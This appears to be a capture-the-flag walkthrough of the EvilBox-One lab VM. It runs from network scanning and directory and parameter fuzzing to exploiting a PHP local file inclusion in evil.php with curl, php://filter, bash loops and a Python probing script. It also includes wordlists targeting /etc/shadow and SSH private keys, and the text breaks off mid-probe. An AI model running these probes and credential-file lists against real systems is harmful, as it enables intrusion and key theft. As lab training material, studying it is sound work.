Target machine: EvilBox---One
Preparation
Target image: https://download.vulnhub.com/evilbox/EvilBox---One.ova
MD5 checksum: c3a65197b891713731e6bb791d7ad259
- Verify from cmd:
certutil -hashfile <file path> MD5
- Verify from PowerShell:
Get-FileHash <file path> -Algorithm MD5 | Format-List
Hypervisor: VirtualBox
Network: Host-Only
Network setup guide: https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
Walkthrough
Finding the target
The usual tools:
- arp-scan
- nmap
- netdiscover
- fping
For a first pass, run sudo arp-scan -l -I eth1
The other scanners each have limitations of one kind or another; nmap is best saved for a deeper scan once the target is pinned down.
Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:15:0f:e5 PCS Systemtechnik GmbH
192.168.56.117 08:00:27:4d:bc:dd PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.140 seconds (119.63 hosts/sec). 3 responded
192.168.56.1 and 192.168.56.100 are the gateway and the DHCP server respectively, so the target is 192.168.56.117.
Run a standard nmap scan: nmap -A -T4 192.168.56.117
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 09:41 CST
Nmap scan report for 192.168.56.117
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 4495500be473a18511ca10ec1ccbd426 (RSA)
| 256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_ 256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds
Port 22 open: OpenSSH 7.9p1
Port 80 open: Apache/2.4.38
OS: Linux (Debian)
SSH is set aside for now:
- no password and no key
- no intelligence to work with at all
Start with HTTP on port 80: even if it cannot be broken directly, it should yield information that can feed an SSH brute-force later.
Web attack
First open http://192.168.56.117:80/ in Firefox for an initial look.
- It is only the Apache2 Debian default page; essentially no usable information.
Use a web content discovery tool to find hidden pages on the site; recommended tools:
- dirsearch
- dirb
- dirbuster
- gobuster
- feroxbuster
- ffuf
- wfuzz
Run dirsearch --url='192.168.56.117:80/'
┌──(kali㉿kali)-[~]
└─$ dirsearch --url='192.168.56.117:80/'
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-_22-11-09_09-52-49.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-11-09_09-52-49.log
Target: http://192.168.56.117:80/
[09:52:49] Starting:
[09:52:52] 403 - 279B - /.ht_wsr.txt
[09:52:52] 403 - 279B - /.htaccess.bak1
[09:52:52] 403 - 279B - /.htaccess.sample
[09:52:52] 403 - 279B - /.htaccess.save
[09:52:52] 403 - 279B - /.htaccess_extra
[09:52:52] 403 - 279B - /.htaccess_orig
[09:52:52] 403 - 279B - /.htaccess_sc
[09:52:52] 403 - 279B - /.htaccess.orig
[09:52:52] 403 - 279B - /.htaccessOLD
[09:52:52] 403 - 279B - /.htaccessOLD2
[09:52:52] 403 - 279B - /.htpasswds
[09:52:52] 403 - 279B - /.html
[09:52:52] 403 - 279B - /.htm
[09:52:52] 403 - 279B - /.htpasswd_test
[09:52:52] 403 - 279B - /.httr-oauth
[09:52:52] 403 - 279B - /.htaccessBAK
[09:52:54] 403 - 279B - /.php
[09:53:51] 200 - 10KB - /index.html
[09:54:23] 200 - 12B - /robots.txt
[09:54:25] 200 - 4B - /secret/
[09:54:25] 301 - 317B - /secret -> http://192.168.56.117/secret/
[09:54:25] 403 - 279B - /server-status
[09:54:25] 403 - 279B - /server-status/
/index.html
Clearly the Apache2 Debian default page seen earlier; no value.
/robots.txt
Normally the robots exclusion file, which can be of some value.
- The robots protocol (also called the crawler protocol or crawler rules) lets a site publish a robots.txt file telling search engines which pages may and may not be crawled; a search engine reads robots.txt to decide whether a page is allowed to be fetched.
- robots.txt is not a firewall and has no enforcement power; a crawler is free to ignore it and fetch the pages anyway.
/secret
A directory, which probably needs further exploration.
First look at http://192.168.56.117:80/robots.txt to see what it holds.
It contains a single line: Hello H4x0r
- H4x0r is leetspeak (l33t speak) for "hacker". Here it is most likely a taunt aimed at the intruder and carries little value, but a password or account name might be related to H4x0r, so note it for later.
A near-empty robots.txt like this mainly serves to keep crawlers away.
What remains of interest is the /secret directory, so run a second round of content discovery against it: dirsearch --url='192.168.56.117:80/secret'
dirsearch finds nothing with its default wordlist, so try a different one:
dirsearch --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -e txt,php,html,jsp
--wordlists= selects the wordlist; seclists is a wordlist collection packaged for Kali and can be installed with apt if it is missing.
-e restricts the search to the listed file extensions.
- Brute-forcing with this list can be slow. If the Kali VM has enough CPU and memory this is no concern; on a weaker VM use gobuster instead:
gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
dirsearch is written in Python, with the speed that implies, whereas gobuster is written in Go and runs at close to C speed.
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.117:80/secret
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,html,jsp
[+] Timeout: 10s
===============================================================
2022/11/09 19:35:29 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 4]
/evil.php (Status: 200) [Size: 0]
Progress: 708415 / 708545 (99.98%)
===============================================================
2022/11/09 19:42:23 Finished
===============================================================
- For web directory brute-forcing the tool matters less than the choice of wordlist.
- The result is /evil.php, our new lead.
Visiting /evil.php shows nothing, even in the page source. A reasonable guess is that this script exists to process data, in which case it must accept request parameters; the next step is parameter brute-forcing.
We use ffuf for this.
The parameter-name wordlist is the classic seclists collection on Kali.
The value wordlist, var.txt, is built by hand:
0
1
a
'
"
(
[
{
<
,
;
?
`
/
\
%
true
false
../robots.txt
H4x0r
Reasoning behind the list: guesses at values that trigger bugs, generic values, a file known to exist, and collected intelligence.
- Numbers: 0, 1 as numeric or boolean values, the classic probe
- Letters: a as a single letter, string or word
- Unbalanced delimiters: ', ", (, [, {, <
- Special characters: , ; ? ` / \ %
- Booleans: true, false
- File inclusion: ../robots.txt, a file we already know exists and whose content is short and easy to recognise in a response
- Collected intelligence: H4x0r
The ffuf command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0
-w specifies a wordlist; with several wordlists the format is path:keyword, and ffuf then tries every combination (clusterbomb mode).
-u is the URL to fuzz, with the keywords standing in for the parameter name and value.
-fs filters by response body size; -fs 0 drops every response whose body is empty.
┌──(kali㉿kali)-[~/workspace]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.56.117/secret/evil.php?params=var
:: Wordlist : params: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Wordlist : var: ./var.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________
[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 50ms]
* params: command
* var: ../robots.txt
:: Progress: [109701/109701] :: Job [1/1] :: 1599 req/sec :: Duration: [0:02:00] :: Errors: 0 ::
- The result shows the parameter is command
- and the value is ../robots.txt, which indicates /evil.php performs a file inclusion
Build a request to test /evil.php further: http://192.168.56.117/secret/evil.php?command=../robots.txt
Opening it in Firefox and viewing the source shows a raw response identical to /robots.txt, so the include apparently returns file content verbatim. Anyone who has studied PHP knows PHP file inclusion vulnerabilities, and that is the angle to work.
Check whether the include supports remote files; if it does, a web shell can be pulled straight in.
┌──(kali㉿kali)-[~/workspace]
└─$ ls
var.txt
┌──(kali㉿kali)-[~/workspace]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
-- second terminal --
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.56.117/secret/evil.php?command=http://192.168.56.116:80/var.txt"
- Remote inclusion is not supported
Next, can PHP's built-in URL-style stream wrappers be used? If a write works, a web shell can be written directly.
┌──(kali㉿kali)-[~/workspace]
└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"
SGVsbG8gSDR4MHIK
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/write/resource=../robots.txt&txt=1"
Hello H4x0r
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" | base64 --decode
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    92  100    92    0     0   8532      0 --:--:-- --:--:-- --:--:--  9200
<?php
$filename = $_GET['command'];
include($filename);
?>
- The php:// wrapper works for reading through the various streams
- but no data can be written
- Reading the source base64-encoded (so include() returns it instead of executing it) lets us see evil.php itself: nothing more than an include of whatever the command parameter names, with no validation at all
Check whether the include can read sensitive system files directly, to keep gathering information and look for a way in.
- The usual candidates: /etc/passwd, /etc/shadow, /etc/sudoers, */.ssh/authorized_keys, ...
Build the wordlist file.txt:
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/bin/php.ini
/etc/anacrontab
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/at.allow
/etc/at.deny
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/fstab
/etc/host.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/etc/httpd/htdocs/index.php
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/ld.so.conf
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/etc/resolv.conf
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/network
/etc/sysconfig/network
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.html
/opt/www/htdocs/index.php
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/root/.atftp_history
/root/.bashrc
/root/.bash_history
/root/.mysql_history
/root/.nano_history
/root/.php_history
/root/.profile
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/anaconda-ks.cfg
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_logerror_log.old
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/php.ini
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd2.2/htdocs/index.html
/usr/local/httpd2.2/htdocs/index.php
/usr/local/lib/php.ini
/usr/local/mysql/bin/mysql
/usr/local/mysql/my.cnf
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/php5.ini
/usr/local/share/examples/php/php.ini
/usr/local/share/examples/php4/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/local/Zend/etc/php.ini
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.html
/var/httpd/htdocs/index.php
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqlderror.log
/var/mail/root
/var/mysql.log
/var/spool/cron/crontabs/root
/var/spool/mail/root
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/www/htdocs/index.php
/var/www/index.html
/var/www/index.php
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/web/conf/php.ini
/www/conf/httpd.conf
/www/htdocs/index.html
/www/htdocs/index.php
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
root/.ssh/authorized_keys
root/.ssh/identity
root/.ssh/identity.pub
root/.ssh/id_dsa
root/.ssh/id_dsa.pub
root/.ssh/id_rsa
root/.ssh/id_rsa.pub
The brute-force loop as a bash script:
for i in $(cat ./file.txt)
do
echo ">>>$i:"
curl "http://192.168.56.117/secret/evil.php?command=$i"
done
The output below has been trimmed: paths that were duplicates, returned nothing, or returned only a stock default file have been removed.
┌──(kali㉿kali)-[~/workspace]
└─$ for i in $(cat ./file.txt)
for> do
for> echo ">>>$i:"
for> curl "http://192.168.56.117/secret/evil.php?command=$i"
for> done
>>>/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
>>>/etc/resolv.conf:
domain home
search home
nameserver 192.168.1.1
>>>/etc/ssh/sshd_config:
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
#PubkeyAuthentication yes
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2
#AuthorizedPrincipalsFile none
#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
PrintLastLog no
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
# no default banner path
#Banner none
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
# override default of no subsystems
Subsystem sftp /usr/lib/openssh/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server
>>>/etc/ssh/ssh_config:
# This is the ssh client system-wide configuration file. See
# ssh_config(5) for more information. This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.
# Configuration data is parsed as follows:
# 1. command line options
# 2. user-specific file
# 3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.
# Site-wide defaults for some commonly used options. For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.
Host *
# ForwardAgent no
# ForwardX11 no
# ForwardX11Trusted yes
# PasswordAuthentication yes
# HostbasedAuthentication no
# GSSAPIAuthentication no
# GSSAPIDelegateCredentials no
# GSSAPIKeyExchange no
# GSSAPITrustDNS no
# BatchMode no
# CheckHostIP yes
# AddressFamily any
# ConnectTimeout 0
# StrictHostKeyChecking ask
# IdentityFile ~/.ssh/id_rsa
# IdentityFile ~/.ssh/id_dsa
# IdentityFile ~/.ssh/id_ecdsa
# IdentityFile ~/.ssh/id_ed25519
# Port 22
# Protocol 2
# Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
# MACs hmac-md5,hmac-sha1,umac-64@openssh.com
# EscapeChar ~
# Tunnel no
# TunnelDevice any:any
# PermitLocalCommand no
# VisualHostKey no
# ProxyCommand ssh -q -W %h:%p gateway.example.com
# RekeyLimit 1G 1h
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
>>>/etc/ssh/ssh_host_rsa_key.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne
Summary of the hits:
- /etc/crontab: default content
- /etc/fstab: default content
- /etc/host.conf: default content
- /etc/ld.so.conf: default content
- /etc/network/interfaces: default content
- /etc/networks: nothing useful
- /etc/passwd
- /etc/resolv.conf: nothing useful
- /etc/ssh/sshd_config: default content
- /etc/ssh/ssh_config: default content
- /etc/ssh/ssh_host_rsa_key.pub
New details:
/etc/passwd
- there is one more user with a login shell, named mowree
/etc/ssh/ssh_host_rsa_key.pub
- an SSH lead: the key comment reads root@EvilBoxOne (host public keys are world-readable by default, so this mostly confirms the hostname)
Still not enough to get in, but mowree is a new lead. Check whether that account keeps SSH material under .ssh. Since the readable /etc/ssh/ssh_host_rsa_key.pub shows the include reaches SSH key files, build a small guess list ssh_dict.txt:
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/ssh_host_dsa_key
/root/.ssh/ssh_host_dsa_key.pub
/root/.ssh/ssh_host_key
/root/.ssh/ssh_host_key.pub
/root/.ssh/ssh_host_rsa_key
/root/.ssh/ssh_host_rsa_key.pub
/home/mowree/.ssh/authorized_keys
/home/mowree/.ssh/identity
/home/mowree/.ssh/identity.pub
/home/mowree/.ssh/id_dsa
/home/mowree/.ssh/id_dsa.pub
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/id_rsa.pub
/home/mowree/.ssh/ssh_host_dsa_key
/home/mowree/.ssh/ssh_host_dsa_key.pub
/home/mowree/.ssh/ssh_host_key
/home/mowree/.ssh/ssh_host_key.pub
/home/mowree/.ssh/ssh_host_rsa_key
/home/mowree/.ssh/ssh_host_rsa_key.pub
Attack script:
for i in $(cat ./ssh_dict.txt);
do
echo "output >>>$i:";
curl "http://192.168.56.117/secret/evil.php?command=$i";
done
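A Python version of the two probe loops above (the file.txt and ssh_dict.txt loops), added here as an example; it is not code from the original post. It builds the evil.php requests with proper URL encoding (the bash loops pass paths raw), decodes php://filter output so PHP source can be read instead of executed, discards empty or stock-file responses the way the trimmed listings were pruned by hand, and derives the ~/.ssh candidate paths from the users with a login shell in /etc/passwd rather than from a hand-written list. The target URL and parameter name are the page's; DEFAULT_MARKERS and SSH_FILES are my own assumptions and should be extended as the target reveals more.

```python
"""Driver for the evil.php include: build requests, decode php://filter
output, drop empty/default responses, derive ~/.ssh probe paths.
Added example, not code from the original post."""
import base64
import binascii
import urllib.request
from urllib.parse import urlencode

# Target and parameter name as found on the page; change for another host.
BASE = "http://192.168.56.117/secret/evil.php"
PARAM = "command"

# Assumed markers of files that are readable but carry no information.
DEFAULT_MARKERS = (
    "# $OpenBSD: sshd_config",
    "# This is the ssh client system-wide configuration file",
)

# Assumed set of files worth probing under each user's ~/.ssh.
SSH_FILES = ("authorized_keys", "id_rsa", "id_rsa.pub", "id_dsa",
             "id_ecdsa", "id_ed25519", "identity", "config", "known_hosts")


def include_url(path, base=BASE, param=PARAM):
    """URL that makes evil.php include `path`; urlencode escapes '/', '&'
    and friends so the server sees exactly the path we meant."""
    return f"{base}?{urlencode({param: path})}"


def filter_url(path, base=BASE, param=PARAM):
    """Same path through php://filter, so PHP source comes back base64
    encoded instead of being executed by include()."""
    wrapped = f"php://filter/read=convert.base64-encode/resource={path}"
    return include_url(wrapped, base, param)


def decode_filter_body(body):
    """Decode a php://filter response body; None when it is not valid
    base64 (an unreadable file yields an empty body)."""
    text = body.strip()
    if not text:
        return None
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(body, markers=DEFAULT_MARKERS):
    """'empty' for missing/unreadable files, 'default' for stock files
    matching a marker, 'hit' for anything worth reading."""
    if not body.strip():
        return "empty"
    if any(m in body for m in markers):
        return "default"
    return "hit"


def shell_users(passwd_text):
    """(user, home) for every /etc/passwd entry with a real login shell."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, home, shell = fields[0], fields[5], fields[6]
        if shell.rsplit("/", 1)[-1] in ("nologin", "false", "true", "sync"):
            continue
        users.append((name, home))
    return users


def ssh_candidates(users, names=SSH_FILES):
    """Probe paths for each user's ~/.ssh, in a stable order."""
    return [f"{home}/.ssh/{n}" for _, home in users for n in names]


def fetch(url, timeout=10):
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def probe(paths, get=fetch):
    """Map each path whose response is a 'hit' to its content.  `get` is
    injectable so the logic can be exercised against canned responses."""
    hits = {}
    for path in paths:
        body = get(include_url(path))
        if classify(body) == "hit":
            hits[path] = body
    return hits


if __name__ == "__main__":
    users = shell_users(fetch(include_url("/etc/passwd")))
    print("login users:", users)
    for path, body in probe(ssh_candidates(users)).items():
        print(f">>> {path}\n{body}")
    src = decode_filter_body(fetch(filter_url("./evil.php")))
    print(src.decode() if src else "(could not read evil.php source)")
```

Running the script against the box reproduces the manual steps: it lists root and mowree as the only login users, probes their .ssh directories, and prints the decoded evil.php source. Passing a `get` callable into probe() is what makes the filtering logic testable without a live target.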
Result:
output >>>/root/.ssh/authorized_keys:
output >>>/root/.ssh/identity:
output >>>/root/.ssh/identity.pub:
output >>>/root/.ssh/id_dsa:
output >>>/root/.ssh/id_dsa.pub:
output >>>/root/.ssh/id_rsa:
output >>>/root/.ssh/id_rsa.pub:
output >>>/root/.ssh/ssh_host_dsa_key:
output >>>/root/.ssh/ssh_host_dsa_key.pub:
output >>>/root/.ssh/ssh_host_key:
output >>>/root/.ssh/ssh_host_key.pub:
output >>>/root/.ssh/ssh_host_rsa_key:
